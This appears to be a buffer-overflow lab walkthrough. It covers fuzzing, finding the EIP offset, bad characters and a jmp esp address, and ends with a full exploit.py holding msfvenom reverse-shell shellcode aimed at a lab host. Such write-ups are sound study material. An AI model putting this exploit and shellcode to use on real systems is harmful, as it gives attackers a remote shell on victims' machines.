Overflow1

1. Fuzz application to find number of bytes needed to crash the application

Bytes needed to crash application: 2000

2. Set mona configuration

!mona config -set workingfolder c:\mona\%p

3. Find EIP offset

We first generate a cyclic pattern of a length 2000 bytes longer than the string that crashed the server

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000

Let's add this to the payload component of our exploit.py. Next, let's run exploit.py.

Next, let's use the following command to find what is inside EIP.

!mona findmsp -distance 2000

Notice that the highlighted line says that the EIP offset is at 1978.

Let's change the EIP offset in exploit.py to 1978 and set our payload to "BBBB". If our EIP offset is correct, when the program crashes, EIP will contain "BBBB" which is 42424242.

True enough, EIP contains 42424242. EIP offset: 1978

4. Find bad characters

Let's generate a byte array in mona:

!mona bytearray -b "\x00"

We then add the output into our payload in exploit.py and run it.

Then we run !mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>.

Notice the mona indicates that \x07, \x08, \x2e, \x2f, \xa0 and \xa1 are bad characters.

My guess is that the bad characters are \x00\x07\x2e\xa0. The reason is usually the first bad character would corrupt the memory leaving the following character to be detected as a bad character by mona.

Let's test this out and remove \x00\x07\x2e\xa0 from our payload.

Hence, our bad characters are "\x00\x07\x2e\xa0"

5. Find jmp esp instruction sets without any bad characters

!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"

We can use the first one.

Jmp esp instruction address: 0x625011af

So let's set the return address in our payload to "\xaf\x11\x50\x62"

6. Generate shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.141.31 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c

Let's copy this into our payload component.

7. Set nop sled in padding

Let's set the nop sled in padding and run exploit.py.

Final Payload

fuzz.py

import socket, time, sys

ip = "10.10.5.24"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
	try:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.settimeout(timeout)
			s.connect((ip, port))
			s.recv(1024)
			print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
			s.send(bytes(string, "latin-1"))
			s.recv(1024)
	except:
		print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
		sys.exit(0)
	string += 100 * "A"
	time.sleep(1)

exploit.py

import socket

ip = "10.10.5.24"
port = 1337

prefix = "OVERFLOW1 " ## optional
eip_offset = 1978 
overflow = "A" * eip_offset
retn = "\xaf\x11\x50\x62"  ## If retn address == 0x625011af. Set retn address in script == \xaf\x11\x50\x62
padding = "\x90" * 24 ## For nop sled
payload= ("\xdb\xd5\xd9\x74\x24\xf4\xbd\x0c\x1e\x6e\x67\x5a\x29\xc9\xb1"
"\x52\x31\x6a\x17\x03\x6a\x17\x83\xce\x1a\x8c\x92\x32\xca\xd2"
"\x5d\xca\x0b\xb3\xd4\x2f\x3a\xf3\x83\x24\x6d\xc3\xc0\x68\x82"
"\xa8\x85\x98\x11\xdc\x01\xaf\x92\x6b\x74\x9e\x23\xc7\x44\x81"
"\xa7\x1a\x99\x61\x99\xd4\xec\x60\xde\x09\x1c\x30\xb7\x46\xb3"
"\xa4\xbc\x13\x08\x4f\x8e\xb2\x08\xac\x47\xb4\x39\x63\xd3\xef"
"\x99\x82\x30\x84\x93\x9c\x55\xa1\x6a\x17\xad\x5d\x6d\xf1\xff"
"\x9e\xc2\x3c\x30\x6d\x1a\x79\xf7\x8e\x69\x73\x0b\x32\x6a\x40"
"\x71\xe8\xff\x52\xd1\x7b\xa7\xbe\xe3\xa8\x3e\x35\xef\x05\x34"
"\x11\xec\x98\x99\x2a\x08\x10\x1c\xfc\x98\x62\x3b\xd8\xc1\x31"
"\x22\x79\xac\x94\x5b\x99\x0f\x48\xfe\xd2\xa2\x9d\x73\xb9\xaa"
"\x52\xbe\x41\x2b\xfd\xc9\x32\x19\xa2\x61\xdc\x11\x2b\xac\x1b"
"\x55\x06\x08\xb3\xa8\xa9\x69\x9a\x6e\xfd\x39\xb4\x47\x7e\xd2"
"\x44\x67\xab\x75\x14\xc7\x04\x36\xc4\xa7\xf4\xde\x0e\x28\x2a"
"\xfe\x31\xe2\x43\x95\xc8\x65\x66\x63\x5f\x6a\x1e\x71\x5f\x84"
"\x82\xfc\xb9\xcc\x2a\xa9\x12\x79\xd2\xf0\xe8\x18\x1b\x2f\x95"
"\x1b\x97\xdc\x6a\xd5\x50\xa8\x78\x82\x90\xe7\x22\x05\xae\xdd"
"\x4a\xc9\x3d\xba\x8a\x84\x5d\x15\xdd\xc1\x90\x6c\x8b\xff\x8b"
"\xc6\xa9\xfd\x4a\x20\x69\xda\xae\xaf\x70\xaf\x8b\x8b\x62\x69"
"\x13\x90\xd6\x25\x42\x4e\x80\x83\x3c\x20\x7a\x5a\x92\xea\xea"
"\x1b\xd8\x2c\x6c\x24\x35\xdb\x90\x95\xe0\x9a\xaf\x1a\x65\x2b"
"\xc8\x46\x15\xd4\x03\xc3\x35\x37\x81\x3e\xde\xee\x40\x83\x83"
"\x10\xbf\xc0\xbd\x92\x35\xb9\x39\x8a\x3c\xbc\x06\x0c\xad\xcc"
"\x17\xf9\xd1\x63\x17\x28") ## Shellcode frm msfvenom
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")